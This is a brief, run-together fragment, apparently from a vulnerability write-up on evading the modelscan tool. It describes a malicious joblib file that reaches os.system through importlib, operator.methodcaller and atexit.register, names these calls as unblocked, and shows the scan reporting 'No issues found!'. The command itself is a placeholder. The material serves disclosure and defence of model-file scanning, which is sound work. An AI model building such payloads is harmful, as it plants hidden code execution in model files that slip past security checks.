atexit handler that executes os.system when the Python process exits normally.importlib.import_module — NOT blockedoperator.methodcaller — NOT blockedatexit.register — NOT blockedos via importlib.import_module('os')operator.methodcaller('system', 'COMMAND')atexit.register(methodcaller, os_module)1modelscan -p exploit_atexit.joblib
2# -> "No issues found!"